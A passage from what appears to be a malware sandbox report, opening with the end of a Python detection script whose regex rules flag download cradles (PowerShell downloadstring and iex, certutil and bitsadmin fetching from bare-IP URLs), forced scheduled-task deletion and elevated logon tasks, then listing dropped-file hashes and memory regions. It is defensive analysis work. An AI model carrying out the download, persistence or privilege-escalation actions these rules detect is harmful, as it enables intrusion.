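    ("lolbin_http_download", "T1105", r"(?:wget|curl|certutil|bitsadmin)\.exe",
     r"(?:https?://)?\d{1,3}(?:\.\d{1,3}){3}/"),                     # bare-IP URL
    ("schtasks_delete_forced", "T1053.005", r"schtasks\.exe", r"/delete\b.*\s/f\b"),
    ("powershell_download_cradle", "T1059.001", r"powershell\.exe",
     r"downloadstring\(|invoke-webrequest|\biwr\b|\biex\b"),
    ("schtasks_logon_highest", "T1053.005", r"schtasks\.exe",
     r"/create\b.*/sc\s+onlogon\b.*/rl\s+highest\b"),
]


def scan(events):
    """Return one finding dict per (event, rule) match."""
    findings = []
    for pid, image, cmdline in events:
        for rule, technique, image_re, cmd_re in RULES:
            if re.search(image_re, image, re.I) and re.search(cmd_re, cmdline, re.I):
                findings.append({"pid": pid, "image": image, "rule": rule, "technique": technique})
    return findings


def techniques_hit(findings):
    """Distinct technique IDs across the findings, sorted for a stable summary line."""
    return sorted({f["technique"] for f in findings})


def wget_iocs(cmdline):
    """User-Agent and target URL from a wget command line (assumes the URL is the last argument)."""
    ua = re.search(r'--user-agent=("?)([^"\s]+)\1', cmdline)
    return {"user_agent": ua.group(2) if ua else None, "url": cmdline.split()[-1]}


def escalation_chains(events):
    """Directories icacls made writable for Everyone that later hold the target of an
    elevated logon task: any local user who can write there can replace that binary."""
    writable, tasks = {}, []
    for _pid, image, cmdline in events:
        if re.search(r"icacls\.exe", image, re.I):
            m = re.search(r"icacls\s+(\S+)\s.*?/grant\s+(?:everyone|все|\*s-1-1-0):"
                          r"(?:\([a-z]{2}\))*f\b", cmdline, re.I)
            if m:
                path = m.group(1).rstrip("\\")
                writable.setdefault(path.lower(), path)
        elif re.search(r"schtasks\.exe", image, re.I):
            m = re.search(r'/create\b.*/tr\s+"([^"]+)".*/rl\s+highest\b', cmdline, re.I)
            if m:
                tasks.append(m.group(1))
    return sorted((path, target) for key, path in writable.items()
                  for target in tasks if target.lower().startswith(key + "\\"))


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['technique']:10} {h['rule']:30} pid={h['pid']} {h['image']}")
    print("techniques:", techniques_hit(hits))
    print("wget IoCs:", wget_iocs(SAMPLE_EVENTS[6][2]))
    print("escalation chains:", escalation_chains(SAMPLE_EVENTS))
```

The rules are deliberately narrow (an explicit `action=allow` firewall rule, a grant to the Everyone SID, a `/create` with both `ONLOGON` and `HIGHEST`) so that routine administration does not fire them; the correlation in `escalation_chains` is the one finding that turns the individual "possible privilege escalation attempt" hits into a concrete path, and it is what a responder should verify on the host.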
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\chocolatey\choco.exe
Filesize: 7.3MB
MD5: cb3a19901a422660c36a96284b125b29
SHA1: b31020d098e898d3e6e74e46a3be2db375272779
SHA256: 9078bd7a82267c4605dcdf4d4ad8d03150cd9eec84c88965a3fcd4193cf1f8d7
SHA512: 1c6a0d305f0cd0c1d1dfe799c172cbe55503bd940557a67a42758b8d2f3e9707522df9e5d71113915edc4ee3c3714ec899c4452dee897596c7fb01dd6ccc4a68

C:\ProgramData\zem\run.bat
Filesize: 2KB
MD5: 8b3dedfae44579dbb69419c1b7f39cb3
SHA1: 9955cf4cae7f8338286a2891aa357ba6168138e8
SHA256: a1277bd1956b02a2f759ad30eca3215ba2c83eab72dfa9f815d39564bc4a9e1c
SHA512: ff95d8854dd0b017bbe1cec582b3d504e53dad65729034d1ee69d9313cc4279fa9ea0f61f698b04f9a3c3c174260805212b46d606a672538f8c6b56bf9d50fa7

C:\ProgramData\zem\start.bat
Filesize: 415B
MD5: e808c807fb41cb9a2fc8714b1a5cd048
SHA1: 2c7843c932301f6ceed5ace6753999eb0bc83366
SHA256: 3ee70cf43535fc65581f3edf34674e8f2769e661911ba7cf2dcb359cedf40fb8
SHA512: de65ddc77e1542a653dc049d4d5dcbab03bd7b63921844d6a4b4cf6c12c33d0c0ae27ff7f38d6cbd8c2708fb4e2b8ad4d8ea8434e3d3b491cf805aafe9a201ad

C:\ProgramData\zem\start.ps1
Filesize: 1KB
MD5: bf8561246e2dad06c4ce34b397e874d3
SHA1: 47fd915a1094f373f445186b438703de228481a6
SHA256: c57a761935e8b3a9cf697f6d1ad069cc839bb98ea79beeb5ad635802ce10500d
SHA512: 45047c45e6964859b601593647489e2440a1b0ff8c1a826fcd35a5f945275410cff79d4d4b95ee378c63b818db8fac999f7b620e6722da68119ee07c726bae5e

C:\ProgramData\zem\tmp.exe
Filesize: 532KB
MD5: cba9caa64e418a546044daa8744800b3
SHA1: 72060361b8a025ea3e132f6015cb20a87d3dff44
SHA256: 9aa8880ca3650ef28c7a1dd5869a4d720ca0f62bda8ada3fcd86226b6f20e123
SHA512: aac883eb4a0d5718d64a592632d1270c3f7ab8b8e1555f0c0a940922bc325dc07dea44a09ea3da0a0e834a4b266f1d6eb20b54523811c5992abbfc9bc56e4129

C:\ProgramData\zem\wget.exe
Filesize: 392KB
MD5: bd126a7b59d5d1f97ba89a3e71425731
SHA1: 457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256: a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA512: 3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 3KB
MD5: fe3aab3ae544a134b68e881b82b70169
SHA1: 926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6
SHA256: bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b
SHA512: 3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: c5e9b9cd25ed3f12b42381eed720f66c
SHA1: 940a2ff87a60bf3cef0688520c16d8560a465d0c
SHA256: 54b57c9f9b168348e3cdcb1e7e41500602a2267d35c71675810aa34fca004164
SHA512: 7136952640574008e1d38a5737f150f044205ed0fca86d5455e208c8b636a57b55b1e5ce9defd331e8b0431775b979a409f9abb27ef0b01429cc30c21e7e9b37

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
MD5: 692a440f9cfbeaf648632aead685a5a1
SHA1: e4e4bd8405be77294f4be5ea18b5e05b139f35af
SHA256: 3e1615e7774bd98860c984570515c293b64cf07f1b8e6688a72e78fa9ebed0f4
SHA512: c7501a0fc978d0f06f32c4a205246763796a20c0b2514f00cb6676c8c95ab38d463b87c2973ca2b9b3e2fee3bc7ded869f5896c498303397167c4b5f069db519

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 64B
MD5: e5b84d9e354fd09e2bb5c57546905f44
SHA1: 902c3fa5acd848e053da89d434fea41933e98d78
SHA256: 7615b74b755b33bde20d6026bd14a1cb1866d3013b9dc231a3dfeb071b4e29d2
SHA512: 7531296d1d190e3e6b4be560658e939d8c6fdec5d22b50a6068a66feb2a85a36715d12170d14c52d27d4fe57184e9297b029732401033ede186cc446b481c1e9

C:\Users\Admin\AppData\Local\Temp\RESA2AD.tmp
Filesize: 1KB
MD5: 4b014ab5e2f04258527b1faf9717890f
SHA1: 1f50e968ff7a264173661331688af01137a654f4
SHA256: d700f55ada9a9e601da68e977854dd734b5b1e16d0793ff67b541c6504e60682
SHA512: 8a023a89aa9a5ca18b8a15275d78a22f96b425783393440b0f8b62a8df7ce4e031003eaaecbad2d7547d617b4d02e6c4e15f50efe2c8f4e4c43f32afe096cbf9

C:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.dll
Filesize: 3KB
MD5: 6aec9f305454797aff7a96c0b3efff4d
SHA1: 299cd53129e8bc1d18ea734c05211ed154cb5236
SHA256: c5b124cdffd31f3d5224878bb1594e2221d1431c4a4dd452fee0a5f85dc9c6a7
SHA512: e0d4cc98e7f316e86cad5ba51f616310c5d2db6840d21fa25a034378832b1ad4c5332af9df8c96b4d98ce2c3a49360003404c2bbb1c312ffad59cba42a156c19

\??\c:\Users\Admin\AppData\Local\Temp\pftbpevt\CSCA5BC580AF6EE420E902A6861B0103F6C.TMP
Filesize: 652B
MD5: df02626815bf271a859b37e6d143d96d
SHA1: 86144242dbcf2e59034398440ae0f855c5cd2f2c
SHA256: dc867d9227477c215e1d68c97d90c1d9c854fbb6ed057ac40b9c2a7184b53421
SHA512: f4a44c7e8cde0f7812abf7ea31e071232f18eed97693527b8dc60e2d430dbfabf8453fd92571b04f5e33b03c8cb4d6fd83a7ea8911281488299e56252bb3c239

\??\c:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.0.cs
Filesize: 363B
MD5: fe0a20ae8ae6560ff6da930c7a650c80
SHA1: b17a90207c3fd39abfcd37a79428961d401c0de6
SHA256: 2887d6cced4527e90685dea484f31e882a7352ca66bdb5f5c7dd8924b6885dce
SHA512: d2505e75392877bc4bff0b9b145da35fb2c4fea86c6c6ee3ec7af06fb774abb27dd651242f6797e0e81127619a64662874cc1623262607de65fb332848de4531

\??\c:\Users\Admin\AppData\Local\Temp\pftbpevt\pftbpevt.cmdline
Filesize: 369B
MD5: 6a80b1cb12e12d1aacbce1736d5951b3
SHA1: 5d563403102262f74f41c688474e4d649295ed35
SHA256: 71c86045ff58eb88a33c6ee52bfa275d257109ef428309aa8de3d18bfd10e9fb
SHA512: 3431cafd3a6abcb7e66e0b029be7a7b2bdc11aeb421cb4798f58441eda8dce8457560db9fc3c179be95b53898cd0a7235fcae6cb19690de5e27b9318d7ddb7ff
-
memory/388-137-0x0000000000000000-mapping.dmp
-
memory/644-133-0x0000000000000000-mapping.dmp
-
memory/644-186-0x0000000000000000-mapping.dmp
-
memory/736-193-0x0000000000000000-mapping.dmp
-
memory/976-195-0x0000000000000000-mapping.dmp
-
memory/992-179-0x0000000000000000-mapping.dmp
-
memory/1084-135-0x0000000000000000-mapping.dmp
-
memory/1104-182-0x0000000000000000-mapping.dmp
-
memory/1144-196-0x0000000000000000-mapping.dmp
-
memory/1180-139-0x0000000000000000-mapping.dmp
-
memory/1188-161-0x0000000000000000-mapping.dmp
-
memory/1264-224-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp
Filesize
10.8MB
-
memory/1264-217-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp
Filesize
10.8MB
-
memory/1264-208-0x00000260F1EB0000-0x00000260F1EBA000-memory.dmp
Filesize
40KB
-
memory/1264-207-0x00000260F1ED0000-0x00000260F1EE2000-memory.dmp
Filesize
72KB
-
memory/1264-205-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp
Filesize
10.8MB
-
memory/1264-204-0x00000260F1210000-0x00000260F1232000-memory.dmp
Filesize
136KB
-
memory/1264-183-0x0000000000000000-mapping.dmp
-
memory/1292-164-0x0000000000000000-mapping.dmp
-
memory/1320-187-0x0000000000000000-mapping.dmp
-
memory/1340-156-0x0000000000000000-mapping.dmp
-
memory/1340-232-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp
Filesize
10.8MB
-
memory/1412-169-0x0000000000000000-mapping.dmp
-
memory/1504-140-0x0000000000000000-mapping.dmp
-
memory/1592-178-0x0000000000000000-mapping.dmp
-
memory/1644-158-0x0000000000000000-mapping.dmp
-
memory/1688-198-0x0000000000000000-mapping.dmp
-
memory/1864-132-0x0000000000000000-mapping.dmp
-
memory/1864-180-0x0000000000000000-mapping.dmp
-
memory/1912-144-0x0000000000400000-0x00000000004EF000-memory.dmp
Filesize
956KB
-
memory/1912-141-0x0000000000000000-mapping.dmp
-
memory/2056-185-0x0000000000000000-mapping.dmp
-
memory/2120-157-0x0000000000000000-mapping.dmp
-
memory/2128-181-0x0000000000000000-mapping.dmp
-
memory/2164-200-0x0000000000000000-mapping.dmp
-
memory/2240-173-0x0000000000000000-mapping.dmp
-
memory/2552-237-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp
Filesize
10.8MB
-
memory/2552-235-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp
Filesize
10.8MB
-
memory/2576-202-0x0000000000000000-mapping.dmp
-
memory/2648-188-0x0000000000000000-mapping.dmp
-
memory/2660-201-0x0000000000000000-mapping.dmp
-
memory/2676-197-0x0000000000000000-mapping.dmp
-
memory/2832-172-0x0000000000000000-mapping.dmp
-
memory/2928-190-0x0000000000000000-mapping.dmp
-
memory/2960-149-0x0000000000000000-mapping.dmp
-
memory/3060-163-0x0000000000000000-mapping.dmp
-
memory/3424-138-0x0000000000000000-mapping.dmp
-
memory/3468-165-0x0000000000000000-mapping.dmp
-
memory/3476-162-0x0000000000000000-mapping.dmp
-
memory/3560-194-0x0000000000000000-mapping.dmp
-
memory/3572-191-0x0000000000000000-mapping.dmp
-
memory/3596-166-0x0000000000000000-mapping.dmp
-
memory/3660-153-0x0000000000000000-mapping.dmp
-
memory/3772-199-0x0000000000000000-mapping.dmp
-
memory/3780-145-0x0000000000000000-mapping.dmp
-
memory/3780-147-0x0000000000400000-0x00000000004EF000-memory.dmp
Filesize
956KB
-
memory/3780-148-0x0000000000400000-0x00000000004EF000-memory.dmp
Filesize
956KB
-
memory/3820-152-0x0000000000000000-mapping.dmp
-
memory/3824-192-0x0000000000000000-mapping.dmp
-
memory/3912-184-0x0000000000000000-mapping.dmp
-
memory/4088-177-0x0000000000000000-mapping.dmp
-
memory/4092-216-0x0000000000AD0000-0x000000000121A000-memory.dmp
Filesize
7.3MB
-
memory/4092-223-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp
Filesize
10.8MB
-
memory/4092-218-0x00007FFDCAFB0000-0x00007FFDCBA71000-memory.dmp
Filesize
10.8MB
-
memory/4092-219-0x0000000001780000-0x00000000017A0000-memory.dmp
Filesize
128KB
-
memory/4092-220-0x000000001D280000-0x000000001D2D0000-memory.dmp
Filesize
320KB
-
memory/4092-221-0x000000001D350000-0x000000001D3C6000-memory.dmp
Filesize
472KB
-
memory/4092-222-0x0000000001A40000-0x0000000001A5E000-memory.dmp
Filesize
120KB
-
memory/4224-171-0x0000000000000000-mapping.dmp
-
memory/4268-136-0x0000000000000000-mapping.dmp
-
memory/4280-150-0x0000000000000000-mapping.dmp
-
memory/4288-175-0x0000000000000000-mapping.dmp
-
memory/4352-189-0x0000000000000000-mapping.dmp
-
memory/4356-168-0x0000000000000000-mapping.dmp
-
memory/4464-227-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp
Filesize
10.8MB
-
memory/4464-228-0x00007FFDCB0D0000-0x00007FFDCBB91000-memory.dmp
Filesize
10.8MB
-
memory/4544-167-0x0000000000000000-mapping.dmp
-
memory/4684-170-0x0000000000000000-mapping.dmp
-
memory/4708-176-0x0000000000000000-mapping.dmp
-
memory/4720-206-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp
Filesize
1.3MB
-
memory/4720-230-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp
Filesize
1.3MB
-
memory/4720-134-0x00007FF7DA510000-0x00007FF7DA652000-memory.dmp
Filesize
1.3MB
-
memory/4780-154-0x0000000000000000-mapping.dmp
-
memory/4796-160-0x0000000000000000-mapping.dmp
-
memory/4888-174-0x0000000000000000-mapping.dmp
-
memory/5016-155-0x0000000000000000-mapping.dmp
-
memory/5072-203-0x0000000000000000-mapping.dmp
-
memory/5116-159-0x0000000000000000-mapping.dmp